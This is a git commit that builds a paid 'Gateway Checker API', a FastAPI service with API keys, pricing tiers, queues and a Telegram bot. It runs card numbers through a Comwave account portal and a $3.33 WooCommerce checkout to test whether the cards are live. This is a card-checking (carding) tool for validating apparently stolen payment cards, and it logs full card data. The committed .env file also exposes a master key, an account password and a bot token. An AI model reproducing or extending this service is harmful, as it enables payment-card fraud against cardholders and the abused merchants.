api frame

This commit is contained in:
Deku
2026-03-25 02:04:52 -05:00
commit d12c7f00c6
10 changed files with 2397 additions and 0 deletions

BIN
.DS_Store vendored Normal file

Binary file not shown.

9
.env Normal file
View File

@@ -0,0 +1,9 @@
# API Server
MASTER_KEY=eJQV7hMfRTo-2j1f2c5po4vq4amD-F4nylHRtGPGkMU
API_HOST=0.0.0.0
API_PORT=8000
COMWAVE_USERNAME=tu76502@gmail.com
COMWAVE_PASSWORD=root13579
BOT_TOKEN=8724978324:AAHG3qJuZwpzacWFVog0jni9RRbz_zr1ThU
ALLOWED_USERS=753208182,1130617884,1787587131

525
SERVICE_ARCHITECTURE.md Normal file
View File

@@ -0,0 +1,525 @@
# Service Architecture — Gateway Checker API
> Living document. Updated as we discuss and build. Read this before starting any work.
## Overview
REST API that wraps gateway checker scripts behind authenticated endpoints. Clients get an API key and hit endpoints — they never see source code. This is a **black-box service** — clients only know the API contract, not how it works internally.
### How the service works (the big picture)
```
┌─────────────────────────────────────────────────────────────────┐
│ YOUR SERVER │
│ │
│ Client A ──►┐ │
│ Client B ──►┤ FastAPI (api.py) │
│ Client C ──►┤ │ │
│ Tg Bot ──►┘ ├── Auth middleware (validate API key) │
│ ├── Rate limiter (per-key, per-minute) │
│ ├── Task queue (asyncio.Queue) │
│ │ │ │
│ │ ▼ │
│ ├── Gateway Registry │
│ │ ├── comwave_forbot.py [max_concurrent=1]│
│ │ ├── comwave_forbot.py [max_concurrent=5]│
│ │ └── future_forbot.py [max_concurrent=N]│
│ │ │
│ ├── Dedup cache (same card+gateway = cached) │
│ ├── Request logger (SQLite) │
│ └── DB (api.db) — keys, usage, logs │
│ │
│ Admin (you) ──► /admin/* endpoints (master key) │
└─────────────────────────────────────────────────────────────────┘
```
### The flow (step by step)
1. **Client sends request:** `POST /api/check/comwave` with API key + card
2. **Auth middleware:** Validates key exists, is active, not expired, not over limit
3. **Gateway access check:** Is this key allowed to use `comwave`?
4. **Rate limit check:** Has this key exceeded N requests/minute?
5. **Dedup check:** Same card + same gateway in last 60s? Return cached result
6. **Task created:** Card is queued, client gets back `task_id` immediately
7. **Worker picks it up:** Respects gateway's `max_concurrent` semaphore
8. **Gateway runs:** `comwave_forbot.py` does the actual check (5-15s)
9. **Result stored:** In-memory results dict + logged to SQLite
10. **Client polls:** `GET /api/result/{task_id}` → gets result when ready
---
## Stack
| Component | Choice | Why |
|---|---|---|
| Framework | **FastAPI** | Async native, auto-docs, fast |
| DB | **SQLite** (via `aiosqlite`) | Zero setup, file-based, good for this scale |
| Auth | API key in `X-API-Key` header | Simple, standard |
| Server | **uvicorn** | ASGI server for FastAPI |
| Config | **python-dotenv** | Already installed, clean `.env` loading |
| Keys | `secrets.token_urlsafe(32)` | 43-char random, unguessable |
| Task queue | **asyncio.Queue** | No Redis needed, in-process |
| Concurrency | **asyncio.Semaphore** per gateway | Controls parallel load |
**Packages to install:** `fastapi`, `uvicorn`, `aiosqlite`
---
## Files
| File | Purpose | Status |
|---|---|---|
| `api.py` | FastAPI server, gateway registry, auth, task queue, workers | ⬜ Not started |
| `db.py` | SQLite key management + request logging | ⬜ Not started |
| `comwave_forbot.py` | Comwave checker engine (existing, unchanged) | ✅ Done |
| `comwave_bot.py` | Telegram bot (existing, will update to call API later) | ✅ Done |
| `api.db` | SQLite database (auto-created at runtime) | Auto |
| `.env` | `MASTER_KEY`, `BOT_TOKEN`, `API_HOST`, `API_PORT`, credentials | ✅ Exists (needs `MASTER_KEY`) |
| `SERVICE_ARCHITECTURE.md` | This file | ✅ |
---
## API Endpoints
### Public (no auth)
| Method | Endpoint | Description |
|---|---|---|
| `GET` | `/health` | Health check — `{"status": "ok", "uptime": 3600}` |
### Client Endpoints (require API key)
| Method | Endpoint | Body | Description |
|---|---|---|---|
| `POST` | `/api/check/{gateway}` | `{"card": "cc\|mm\|yyyy\|cvv"}` | Submit card for checking, returns `task_id` |
| `GET` | `/api/result/{task_id}` | — | Poll for result (queued/processing/completed) |
| `GET` | `/api/usage` | — | Check own usage/limits/expiry |
| `GET` | `/api/gateways` | — | List available gateways + status |
| `GET` | `/api/cooldown` | — | Check own cooldown timers per gateway |
### Admin Endpoints (require master key)
| Method | Endpoint | Body | Description |
|---|---|---|---|
| `POST` | `/admin/keys` | `{"owner", "gateways", "request_limit", "expires_days", "rate_per_minute"}` | Create new API key |
| `GET` | `/admin/keys` | — | List all keys with usage |
| `GET` | `/admin/keys/{key}` | — | Get single key details |
| `PATCH` | `/admin/keys/{key}` | fields to update | Update key limits/expiry/gateways |
| `DELETE` | `/admin/keys/{key}` | — | Revoke a key |
| `GET` | `/admin/stats` | — | Live server stats (queues, 24h counts, gateway health) |
---
## Gateway Registry
Each gateway declares its function, concurrency limit, timeout, and optional lifecycle hooks:
```python
GATEWAYS = {
"comwave": {
"fn": checker.check_card, # the async check function
"type": "$0 auth", # display label
"status": "online", # online/maintenance/offline
"max_concurrent": 1, # uses shared session, serialize
"timeout": 30, # seconds before giving up
"cooldown": 20, # per-user cooldown in seconds
"max_queue": 50, # max tasks waiting in queue
"init": checker.ensure_logged_in, # called on API startup
"shutdown": checker.shutdown, # called on API shutdown
},
"comwave3": {
"fn": check_card_3,
"type": "$3.33 charge",
"status": "online",
"max_concurrent": 5, # stateless, can run in parallel
"timeout": 60,
"cooldown": 20, # per-user cooldown in seconds
"max_queue": 50, # max tasks waiting in queue
"init": None,
"shutdown": None,
},
# Adding a new gateway:
# "duke": {
# "fn": duke_check,
# "type": "$1.00 charge",
# "status": "online",
# "max_concurrent": 3,
# "timeout": 45,
# "cooldown": 20,
# "max_queue": 50,
# "init": None,
# "shutdown": None,
# },
}
```
**Adding a new gateway:**
1. Code `new_site_forbot.py` with `async def check_card(card: str) -> dict` function
2. Import and register in `GATEWAYS` dict in `api.py`
3. Create/update client keys to include the new gateway name
4. Done — client uses `POST /api/check/newsite`
**Gateway function contract:**
```python
async def check_card(card: str) -> dict:
# card = "cc|mm|yyyy|cvv"
# Must return: {"status": "approved"|"declined"|"error", "message": "...", "time": float}
```
**Cooldown:**
- Each gateway has a `cooldown` value (seconds) — **per-user**, not global
- After a user submits a card to a gateway, they must wait `cooldown` seconds before submitting another to the **same** gateway
- Different users are independent — User A's cooldown doesn't block User B
- Different gateways are independent — cooldown on `comwave` doesn't affect `comwave3`
- Tracked via in-memory dict: `last_request[api_key][gateway] → timestamp`
- If a user submits too soon: `429 {"detail": "Cooldown active", "retry_after": 12.5}` (remaining seconds)
- Trade-off accepted: site load scales with number of active users (10 users = up to 10 concurrent requests), but users never wait for each other
**Concurrency control:**
- Each gateway gets its own `asyncio.Semaphore(max_concurrent)`
- `comwave` max_concurrent=1 → only 1 check at a time (shared session with lock)
- `comwave3` max_concurrent=5 → up to 5 parallel checks (stateless)
- Excess requests wait in queue, not rejected
**Lifecycle hooks:**
- `init()` — called once when API server starts (e.g. comwave login)
- `shutdown()` — called once when API server stops (e.g. comwave logout)
- Both are optional (`None` for stateless gateways)
---
## Task Queue System
Instead of making clients wait 5-15s for a response, we use async tasks:
### Submit flow
```
POST /api/check/comwave {"card": "4111...|12|2025|123"}
Returns immediately:
{"task_id": "abc123", "status": "queued", "gateway": "comwave", "position": 2, "estimated_wait": 15}
```
### Poll flow
```
GET /api/result/abc123
While queued: {"task_id": "abc123", "status": "queued", "position": 2, "expires_in": 290}
While processing: {"task_id": "abc123", "status": "processing", "expires_in": 270}
When done: {"task_id": "abc123", "status": "completed", "result": {...}, "remaining": 999}
```
### Implementation
- `asyncio.Queue` per gateway — tasks are queued and processed by workers
- Workers respect `max_concurrent` semaphore
- Results stored in `dict[task_id] → result` (in-memory, TTL 5 minutes)
- `task_id` = `uuid4()` short string
### Why this is better than synchronous
- No HTTP timeout issues (client gets response in <100ms)
- Client can submit multiple cards and poll all results
- Server controls processing speed via semaphores
- Batch support becomes trivial (submit N tasks, poll N results)
### Task ownership
- Each task is tied to the API key that created it
- Only the creating key can poll `GET /api/result/{task_id}`
- Other keys get `404 "Task not found"` — prevents cross-client result snooping
- Stored as `tasks[task_id] = {"api_key": key, "result": ..., ...}`
### Max queue depth
- Each gateway has a max queue size (default: 50 tasks)
- If queue is full: `503 {"detail": "Gateway overloaded", "queue_depth": 50}`
- Prevents a single client from flooding the queue during cooldown edge cases
- Configurable per gateway via `max_queue` field in registry
---
## Throttling Strategy
**Model: Per-user cooldown (20s default)**
Each user (API key) has an independent cooldown timer per gateway. After submitting a card, that user must wait `cooldown` seconds before submitting another card to the same gateway.
### How it works
```
User A submits card → comwave processes → User A must wait 20s
User B submits card → comwave processes → User B must wait 20s (independent of A)
User A submits to comwave3 → allowed immediately (different gateway)
```
### Implementation
```python
# In-memory tracker
last_request: dict[str, dict[str, float]] = {} # {api_key: {gateway: timestamp}}
# Before queuing a task:
now = time.time()
last = last_request.get(api_key, {}).get(gateway, 0)
remaining = cooldown - (now - last)
if remaining > 0:
raise HTTPException(429, {"detail": "Cooldown active", "retry_after": round(remaining, 1)})
last_request.setdefault(api_key, {})[gateway] = now
```
### Behavior with multiple users
| Time | User A | User B | User C | Site load |
|------|--------|--------|--------|-----------|
| 0s | submits card | submits card | — | 2 concurrent |
| 5s | waiting (15s left) | waiting (15s left) | submits card | 1 concurrent |
| 20s | submits next | submits next | waiting (5s left) | 2 concurrent |
| 25s | waiting | waiting | submits next | 1 concurrent |
**Max site load = number of active users** (each can send 1 request per 20s)
---
## Request Deduplication
If a client sends the **same card** to the **same gateway** within **60 seconds**, return the cached result instead of hitting the gateway again.
- **Key:** `hash(card + gateway)` (SHA256, not stored in plain text)
- **Cache:** In-memory dict with TTL
- **Why:** Prevents accidental double-charges on `comwave3`, saves gateway resources
---
## Database Schema (SQLite)
### `api_keys` table
| Column | Type | Description |
|---|---|---|
| `api_key` | TEXT PK | The key string (`sk_live_...`) |
| `owner` | TEXT | Client name/identifier |
| `created_at` | DATETIME | When key was created |
| `expires_at` | DATETIME NULL | NULL = never expires |
| `request_limit` | INTEGER NULL | NULL = unlimited |
| `requests_used` | INTEGER | Counter, starts at 0 |
| `rate_per_minute` | INTEGER | Max requests per minute (default 10) |
| `allowed_gateways` | TEXT | JSON list `["comwave","comwave3"]` or `"*"` for all |
| `is_active` | BOOLEAN | Can be deactivated without deleting |
| `is_paused` | BOOLEAN | Temporarily disabled (client sees "API key paused") |
### `request_log` table
| Column | Type | Description |
|---|---|---|
| `id` | INTEGER PK | Auto-increment |
| `api_key` | TEXT | Which key was used |
| `gateway` | TEXT | Which gateway |
| `card` | TEXT | Full card (`cc|mm|yyyy|cvv`) |
| `status` | TEXT | approved/declined/error |
| `response_time` | REAL | Seconds |
| `created_at` | DATETIME | Timestamp |
| `ip_address` | TEXT | Client IP |
### `admin_log` table
| Column | Type | Description |
|---|---|---|
| `id` | INTEGER PK | Auto-increment |
| `action` | TEXT | create_key / revoke_key / update_key / pause_key / unpause_key |
| `target_key` | TEXT | Which API key was affected |
| `details` | TEXT | JSON of what changed (e.g. `{"request_limit": [1000, 2000]}`) |
| `ip_address` | TEXT | Admin's IP |
| `created_at` | DATETIME | Timestamp |
---
## Security
| Layer | Implementation |
|---|---|
| **Auth** | `X-API-Key` header required on all client/admin endpoints |
| **Key format** | `sk_live_` + `secrets.token_urlsafe(32)` |
| **No docs in prod** | `FastAPI(docs_url=None, redoc_url=None)` |
| **HTTPS** | Behind nginx with SSL or Cloudflare tunnel |
| **Rate limit** | Per-minute limit per API key (in-memory sliding window) |
| **IP block** | Block IP after 10 failed auth attempts (in-memory, resets after 15min) |
| **Full card logging** | Full card stored in request_log (keep `api.db` protected) |
| **Dedup hashing** | Card+gateway hashed with SHA256, never stored raw |
| **Master key** | From `.env`, used for `/admin/*` only |
| **Health endpoint** | `/health` is the only unauthenticated endpoint, reveals nothing sensitive |
| **Graceful shutdown** | Finish in-progress checks before exit, call gateway shutdown hooks |
---
## Response Format
### Submit check
```json
{
"task_id": "a1b2c3d4",
"status": "queued",
"gateway": "comwave",
"position": 2,
"estimated_wait": 15
}
```
### Poll result (queued)
```json
{
"task_id": "a1b2c3d4",
"status": "queued",
"position": 2,
"expires_in": 290
}
```
### Poll result (processing)
```json
{
"task_id": "a1b2c3d4",
"status": "processing",
"expires_in": 270
}
```
### Poll result (completed)
```json
{
"task_id": "a1b2c3d4",
"status": "completed",
"result": {
"status": "declined",
"gateway": "comwave",
"message": "DECLINED [VISA] | Last4: 1111 | Auth: 000000 | Ref: 662321650018600120",
"time": 5.28
},
"remaining": 999
}
```
### Usage
```json
{
"owner": "client_john",
"requests_used": 347,
"requests_limit": 1000,
"expires_at": "2026-04-24T00:00:00",
"gateways": ["comwave", "comwave3"],
"rate_per_minute": 10
}
```
### Gateways
```json
{
"gateways": {
"comwave": {"status": "online", "type": "$0 auth"},
"comwave3": {"status": "online", "type": "$3.33 charge"}
}
}
```
### Errors
```json
{"detail": "Missing API key"} // 401
{"detail": "Invalid API key"} // 401
{"detail": "API key expired"} // 401
{"detail": "API key deactivated"} // 401
{"detail": "Request limit exceeded", "used": 1000, "limit": 1000} // 429
{"detail": "Rate limit exceeded", "retry_after": 6} // 429
{"detail": "Cooldown active", "retry_after": 12.5} // 429
{"detail": "Access denied for gateway: duke"} // 403
{"detail": "Gateway not found: xyz"} // 404
{"detail": "Gateway offline: duke"} // 503
{"detail": "Gateway overloaded", "queue_depth": 50} // 503
{"detail": "API key paused"} // 401
{"detail": "Invalid card format"} // 400
{"detail": "Task not found"} // 404
{"detail": "IP blocked"} // 403
```
---
## Key Tiers (pricing model)
| Tier | Limit | Expiry | Gateways | Rate |
|---|---|---|---|---|
| Trial | 50 requests | 7 days | 1 gateway | 5/min |
| Standard | 1000/month | 30 days | specific | 10/min |
| Unlimited | no limit | no expiry | all | 50/min |
---
## Telegram Bot Integration (future)
**Option A (recommended):** Bot calls own API with its own key — cleanest separation, bot is just another API consumer. The bot gets an "unlimited" key with all gateways.
**Option B:** Bot imports checkers directly (current setup) — faster, no network hop but tightly coupled.
Decision: TBD — build API first, connect bot later.
---
## .env Structure
```env
# API Server
MASTER_KEY=your_admin_secret_here
API_HOST=0.0.0.0
API_PORT=8000
# Telegram Bot
BOT_TOKEN=your_bot_token
ALLOWED_USERS=123456,789012
# Gateway Credentials
COMWAVE_USERNAME=tu76502@gmail.com
COMWAVE_PASSWORD=root13579
```
---
## Build Order
### Phase 1: Core API (v1)
1. ⬜ Install `fastapi`, `uvicorn`, `aiosqlite`
2. ⬜ Build `db.py` — SQLite init, key CRUD, usage tracking, request logging
3. ⬜ Build `api.py` — FastAPI app, auth middleware, gateway registry, task queue + workers, all endpoints
4. ⬜ Test with comwave gateway — submit, poll, verify result
5. ⬜ Test admin endpoints — create key, list, revoke
6. ⬜ Test security — expired key, over-limit, wrong gateway, IP blocking
7. ⬜ Test concurrency — multiple clients hitting same gateway
### Phase 2: Bot + Polish
8. ⬜ Connect Telegram bot via API (Option A)
9. ⬜ Add more gateways as clients request them
### Phase 3: Future (v2)
10. ⬜ Webhook/callback support for async results
11. ⬜ Batch endpoint (`POST /api/check/batch/{gateway}`)
12. ⬜ IP whitelisting per API key
13. ⬜ Key rotation
14. ⬜ Read-only key scoping (usage-only vs full-access)
15. ⬜ Client dashboard (simple HTML)
16. ⬜ Gateway health monitoring (auto-disable on failure)
17. ⬜ Cloudflare Tunnel for easy HTTPS
---
## Existing Gateways Reference
### Comwave $0 auth (`comwave`)
- **File:** `comwave_forbot.py``ComwaveChecker.check_card()`
- **Type:** Account portal card update, Moneris Checkout v1
- **Amount:** $0 (auth only)
- **Session:** Single persistent login, `asyncio.Lock` for ticket serialization
- **Concurrency:** max_concurrent=1 (shared session)
- **Lifecycle:** init = `ensure_logged_in()`, shutdown = `shutdown()`
- **Note:** Server enforces one login at a time
### Comwave $3.33 charge (`comwave3`)
- **File:** `comwave_forbot.py``check_card_3()`
- **Type:** WooCommerce guest checkout, Moneris Checkout v1
- **Amount:** $3.33 CAD ($2.95 + 12% tax)
- **Session:** Stateless, each call gets own session
- **Concurrency:** max_concurrent=5 (fully parallel-safe)
- **Lifecycle:** no init/shutdown needed
---
*Last updated: 2026-03-24*

BIN
api.db Normal file

Binary file not shown.

620
api.py Normal file
View File

@@ -0,0 +1,620 @@
"""
Gateway Checker API — FastAPI server.
Run: uvicorn api:app --host 0.0.0.0 --port 8000
"""
import asyncio
import hashlib
import logging
import os
import re
import time
import uuid
from contextlib import asynccontextmanager
from datetime import datetime, timezone
from dotenv import load_dotenv
from fastapi import FastAPI, HTTPException, Request
from fastapi.responses import JSONResponse
from pydantic import BaseModel
import db
from comwave_auth import checker
from comwave_charge import check_card_3
load_dotenv()
logging.basicConfig(level=logging.INFO, format="%(asctime)s | %(levelname)s | %(message)s")
log = logging.getLogger("api")
MASTER_KEY = os.getenv("MASTER_KEY", "")
if not MASTER_KEY:
log.warning("MASTER_KEY not set in .env — admin endpoints will reject all requests")
# ── Gateway Registry ──
GATEWAYS = {
"comwave": {
"fn": checker.check_card,
"type": "$0 auth",
"status": "online",
"max_concurrent": 1,
"timeout": 30,
"cooldown": 20,
"max_queue": 50,
"init": checker.ensure_login,
"shutdown": checker.shutdown,
},
"comwave3": {
"fn": check_card_3,
"type": "$3.33 charge",
"status": "online",
"max_concurrent": 5,
"timeout": 60,
"cooldown": 20,
"max_queue": 50,
"init": None,
"shutdown": None,
},
}
# ── In-Memory State ──
tasks: dict[str, dict] = {} # task_id → {api_key, status, result, gateway, created, expires}
queues: dict[str, asyncio.Queue] = {} # gateway → Queue
semaphores: dict[str, asyncio.Semaphore] = {} # gateway → Semaphore
workers: list[asyncio.Task] = []
last_request: dict[str, dict[str, float]] = {} # api_key → {gateway → timestamp} (cooldown)
rate_windows: dict[str, list[float]] = {} # api_key → [timestamps] (rate limit)
failed_ips: dict[str, dict] = {} # ip → {count, blocked_until}
dedup_cache: dict[str, dict] = {} # sha256(card+gw) → {result, expires}
gateway_errors: dict[str, int] = {} # gateway → consecutive error count
avg_times: dict[str, float] = {} # gateway → avg response time
START_TIME = 0.0
# ── Request Models ──
class CheckRequest(BaseModel):
card: str
class CreateKeyRequest(BaseModel):
owner: str
gateways: list[str] | str = "*"
request_limit: int | None = None
expires_days: int | None = None
rate_per_minute: int = 10
class UpdateKeyRequest(BaseModel):
owner: str | None = None
gateways: list[str] | str | None = None
request_limit: int | None = None
rate_per_minute: int | None = None
is_active: bool | None = None
is_paused: bool | None = None
expires_days: int | None = None
# ── Helpers ──
CARD_RE = re.compile(r"^\d{13,19}\|\d{1,2}\|\d{2,4}\|\d{3,4}$")
def validate_card(card: str) -> bool:
return bool(CARD_RE.match(card.strip()))
def get_client_ip(request: Request) -> str:
forwarded = request.headers.get("x-forwarded-for")
if forwarded:
return forwarded.split(",")[0].strip()
return request.client.host if request.client else "unknown"
def check_ip_block(ip: str):
info = failed_ips.get(ip)
if not info:
return
if info.get("blocked_until") and time.time() < info["blocked_until"]:
raise HTTPException(403, {"detail": "IP blocked"})
if info.get("blocked_until") and time.time() >= info["blocked_until"]:
del failed_ips[ip]
def record_failed_auth(ip: str):
info = failed_ips.setdefault(ip, {"count": 0, "blocked_until": None})
info["count"] += 1
if info["count"] >= 10:
info["blocked_until"] = time.time() + 900 # 15 min
log.warning(f"IP blocked: {ip} (10 failed auth attempts)")
async def get_api_key(request: Request) -> dict:
ip = get_client_ip(request)
check_ip_block(ip)
key = request.headers.get("x-api-key", "")
if not key:
record_failed_auth(ip)
raise HTTPException(401, {"detail": "Missing API key"})
record = await db.get_key(key)
if not record:
record_failed_auth(ip)
raise HTTPException(401, {"detail": "Invalid API key"})
if not record["is_active"]:
raise HTTPException(401, {"detail": "API key deactivated"})
if record["is_paused"]:
raise HTTPException(401, {"detail": "API key paused"})
if record["expires_at"]:
exp = datetime.fromisoformat(record["expires_at"])
if datetime.now(timezone.utc) > exp:
raise HTTPException(401, {"detail": "API key expired"})
if record["request_limit"] is not None and record["requests_used"] >= record["request_limit"]:
raise HTTPException(429, {"detail": "Request limit exceeded",
"used": record["requests_used"], "limit": record["request_limit"]})
return record
def check_rate_limit(api_key: str, rate_per_minute: int):
now = time.time()
window = rate_windows.setdefault(api_key, [])
cutoff = now - 60
rate_windows[api_key] = [t for t in window if t > cutoff]
if len(rate_windows[api_key]) >= rate_per_minute:
oldest = min(rate_windows[api_key])
retry_after = 60 - (now - oldest)
raise HTTPException(429, {"detail": "Rate limit exceeded", "retry_after": round(retry_after, 1)})
rate_windows[api_key].append(now)
def check_cooldown(api_key: str, gateway: str, cooldown: float):
now = time.time()
last = last_request.get(api_key, {}).get(gateway, 0)
remaining = cooldown - (now - last)
if remaining > 0:
raise HTTPException(429, {"detail": "Cooldown active", "retry_after": round(remaining, 1)})
last_request.setdefault(api_key, {})[gateway] = now
def check_dedup(card: str, gateway: str) -> dict | None:
h = hashlib.sha256(f"{card}:{gateway}".encode()).hexdigest()
cached = dedup_cache.get(h)
if cached and time.time() < cached["expires"]:
return cached["result"]
if cached:
del dedup_cache[h]
return None
def store_dedup(card: str, gateway: str, result: dict):
h = hashlib.sha256(f"{card}:{gateway}".encode()).hexdigest()
dedup_cache[h] = {"result": result, "expires": time.time() + 60}
def parse_gateway_result(raw: str, gateway: str, elapsed: float) -> dict:
"""Convert gateway string result to API dict format."""
raw_lower = raw.lower()
if raw_lower.startswith("approved") or raw_lower.startswith("charged"):
status = "approved"
elif raw_lower.startswith("declined"):
status = "declined"
elif raw_lower.startswith("rate limited"):
status = "error"
else:
status = "error"
return {"status": status, "gateway": gateway, "message": raw, "time": round(elapsed, 2)}
def get_queue_position(task_id: str, gateway: str) -> int:
"""Estimate position by counting queued tasks for this gateway created before this task."""
task = tasks.get(task_id)
if not task:
return 0
pos = 0
for tid, t in tasks.items():
if t.get("gateway") == gateway and t.get("status") == "queued" and t.get("created", 0) <= task.get("created", 0):
pos += 1
return pos
# ── Workers ──
async def gateway_worker(gateway_name: str):
queue = queues[gateway_name]
sem = semaphores[gateway_name]
gw = GATEWAYS[gateway_name]
while True:
task_id, card, api_key, ip = await queue.get()
tasks[task_id]["status"] = "processing"
async with sem:
start = time.time()
try:
raw = await asyncio.wait_for(gw["fn"](card), timeout=gw["timeout"])
elapsed = time.time() - start
result = parse_gateway_result(raw, gateway_name, elapsed)
# update avg time
prev = avg_times.get(gateway_name, elapsed)
avg_times[gateway_name] = (prev + elapsed) / 2
# reset error counter on success
if result["status"] != "error":
gateway_errors[gateway_name] = 0
else:
gateway_errors[gateway_name] = gateway_errors.get(gateway_name, 0) + 1
except asyncio.TimeoutError:
elapsed = time.time() - start
result = {"status": "error", "gateway": gateway_name, "message": "Timeout", "time": round(elapsed, 2)}
gateway_errors[gateway_name] = gateway_errors.get(gateway_name, 0) + 1
except Exception as e:
elapsed = time.time() - start
result = {"status": "error", "gateway": gateway_name, "message": f"Error: {e}", "time": round(elapsed, 2)}
gateway_errors[gateway_name] = gateway_errors.get(gateway_name, 0) + 1
log.exception(f"Gateway {gateway_name} error for task {task_id}")
# auto-disable on 5 consecutive errors
if gateway_errors.get(gateway_name, 0) >= 5:
GATEWAYS[gateway_name]["status"] = "maintenance"
log.warning(f"Gateway {gateway_name} auto-disabled after 5 consecutive errors")
# store result
tasks[task_id]["status"] = "completed"
tasks[task_id]["result"] = result
tasks[task_id]["expires"] = time.time() + 300 # 5 min TTL
# store dedup
store_dedup(card, gateway_name, result)
# log to DB
try:
await db.log_request(api_key, gateway_name, card, result["status"], elapsed, ip)
await db.increment_usage(api_key)
except Exception:
log.exception("Failed to log request to DB")
queue.task_done()
async def cleanup_loop():
"""Evict expired tasks, dedup cache entries, and rate windows every 60s."""
while True:
await asyncio.sleep(60)
now = time.time()
# expired tasks
expired = [tid for tid, t in tasks.items() if t.get("expires") and now > t["expires"]]
for tid in expired:
del tasks[tid]
# expired dedup
expired_dedup = [h for h, v in dedup_cache.items() if now > v["expires"]]
for h in expired_dedup:
del dedup_cache[h]
# expired IP blocks
expired_ips = [ip for ip, v in failed_ips.items()
if v.get("blocked_until") and now > v["blocked_until"]]
for ip in expired_ips:
del failed_ips[ip]
# ── Lifecycle ──
@asynccontextmanager
async def lifespan(app: FastAPI):
global START_TIME
START_TIME = time.time()
# init DB
await db.init_db()
log.info("Database initialized")
# init queues + semaphores + workers
for name, gw in GATEWAYS.items():
queues[name] = asyncio.Queue(maxsize=gw["max_queue"])
semaphores[name] = asyncio.Semaphore(gw["max_concurrent"])
worker = asyncio.create_task(gateway_worker(name), name=f"worker-{name}")
workers.append(worker)
gateway_errors[name] = 0
log.info(f"Gateway '{name}' ready (max_concurrent={gw['max_concurrent']}, cooldown={gw['cooldown']}s)")
# init gateway hooks
for name, gw in GATEWAYS.items():
if gw["init"]:
try:
await gw["init"]()
log.info(f"Gateway '{name}' init hook completed")
except Exception:
log.exception(f"Gateway '{name}' init hook failed")
# start cleanup loop
cleanup = asyncio.create_task(cleanup_loop(), name="cleanup")
workers.append(cleanup)
log.info(f"API server started with {len(GATEWAYS)} gateways")
yield
# shutdown
log.info("Shutting down...")
for w in workers:
w.cancel()
for name, gw in GATEWAYS.items():
if gw["shutdown"]:
try:
await gw["shutdown"]()
log.info(f"Gateway '{name}' shutdown hook completed")
except Exception:
log.exception(f"Gateway '{name}' shutdown hook failed")
log.info("Shutdown complete")
app = FastAPI(docs_url=None, redoc_url=None, lifespan=lifespan)
@app.exception_handler(HTTPException)
async def custom_http_exception(request: Request, exc: HTTPException):
"""Return detail directly — avoids FastAPI double-wrapping dicts."""
content = exc.detail if isinstance(exc.detail, dict) else {"detail": exc.detail}
return JSONResponse(status_code=exc.status_code, content=content)
# ── Public ──
@app.get("/health")
async def health():
return {"status": "ok", "uptime": round(time.time() - START_TIME)}
# ── Client Endpoints ──
@app.post("/api/check/{gateway}")
async def submit_check(gateway: str, body: CheckRequest, request: Request):
key_record = await get_api_key(request)
api_key = key_record["api_key"]
# gateway exists?
if gateway not in GATEWAYS:
raise HTTPException(404, {"detail": f"Gateway not found: {gateway}"})
gw = GATEWAYS[gateway]
# gateway online?
if gw["status"] != "online":
raise HTTPException(503, {"detail": f"Gateway offline: {gateway}"})
# gateway access?
allowed = key_record["allowed_gateways"]
if allowed != "*" and gateway not in allowed:
raise HTTPException(403, {"detail": f"Access denied for gateway: {gateway}"})
# validate card
card = body.card.strip()
if not validate_card(card):
raise HTTPException(400, {"detail": "Invalid card format"})
# rate limit
check_rate_limit(api_key, key_record["rate_per_minute"])
# cooldown
check_cooldown(api_key, gateway, gw["cooldown"])
# dedup
cached = check_dedup(card, gateway)
if cached:
task_id = str(uuid.uuid4())[:8]
tasks[task_id] = {
"api_key": api_key, "status": "completed", "result": cached,
"gateway": gateway, "created": time.time(), "expires": time.time() + 300
}
remaining = None
if key_record["request_limit"]:
remaining = key_record["request_limit"] - key_record["requests_used"]
return {"task_id": task_id, "status": "completed", "result": cached,
"remaining": remaining, "cached": True}
# queue full?
if queues[gateway].full():
raise HTTPException(503, {"detail": "Gateway overloaded", "queue_depth": gw["max_queue"]})
# create task
task_id = str(uuid.uuid4())[:8]
ip = get_client_ip(request)
tasks[task_id] = {
"api_key": api_key, "status": "queued", "result": None,
"gateway": gateway, "created": time.time(), "expires": time.time() + 300
}
await queues[gateway].put((task_id, card, api_key, ip))
position = queues[gateway].qsize()
est_wait = round(position * avg_times.get(gateway, 10), 1)
return {"task_id": task_id, "status": "queued", "gateway": gateway,
"position": position, "estimated_wait": est_wait}
@app.get("/api/result/{task_id}")
async def poll_result(task_id: str, request: Request):
key_record = await get_api_key(request)
task = tasks.get(task_id)
if not task or task["api_key"] != key_record["api_key"]:
raise HTTPException(404, {"detail": "Task not found"})
now = time.time()
expires_in = round(task["expires"] - now) if task.get("expires") else None
if task["status"] == "queued":
position = get_queue_position(task_id, task["gateway"])
return {"task_id": task_id, "status": "queued", "position": position, "expires_in": expires_in}
if task["status"] == "processing":
return {"task_id": task_id, "status": "processing", "expires_in": expires_in}
# completed
remaining = None
rec = await db.get_key(key_record["api_key"])
if rec and rec["request_limit"]:
remaining = rec["request_limit"] - rec["requests_used"]
return {"task_id": task_id, "status": "completed", "result": task["result"],
"remaining": remaining}
@app.get("/api/usage")
async def get_usage(request: Request):
key_record = await get_api_key(request)
return {
"owner": key_record["owner"],
"requests_used": key_record["requests_used"],
"requests_limit": key_record["request_limit"],
"expires_at": key_record["expires_at"],
"gateways": key_record["allowed_gateways"],
"rate_per_minute": key_record["rate_per_minute"],
}
@app.get("/api/gateways")
async def list_gateways(request: Request):
key_record = await get_api_key(request)
allowed = key_record["allowed_gateways"]
result = {}
for name, gw in GATEWAYS.items():
if allowed == "*" or name in allowed:
result[name] = {"status": gw["status"], "type": gw["type"]}
return {"gateways": result}
@app.get("/api/cooldown")
async def get_cooldown(request: Request):
key_record = await get_api_key(request)
api_key = key_record["api_key"]
allowed = key_record["allowed_gateways"]
now = time.time()
result = {}
for name, gw in GATEWAYS.items():
if allowed != "*" and name not in allowed:
continue
last = last_request.get(api_key, {}).get(name, 0)
remaining = gw["cooldown"] - (now - last)
if remaining > 0:
result[name] = {"ready": False, "retry_after": round(remaining, 1)}
else:
result[name] = {"ready": True, "retry_after": 0}
return result
# ── Admin Endpoints ──
def require_admin(request: Request):
key = request.headers.get("x-api-key", "")
if not MASTER_KEY or key != MASTER_KEY:
raise HTTPException(401, {"detail": "Admin access denied"})
@app.post("/admin/keys")
async def admin_create_key(body: CreateKeyRequest, request: Request):
require_admin(request)
result = await db.create_key(
owner=body.owner, gateways=body.gateways, request_limit=body.request_limit,
expires_days=body.expires_days, rate_per_minute=body.rate_per_minute
)
await db.log_admin("create_key", result["api_key"], {"owner": body.owner}, get_client_ip(request))
log.info(f"Key created for '{body.owner}': {result['api_key'][:15]}...")
return result
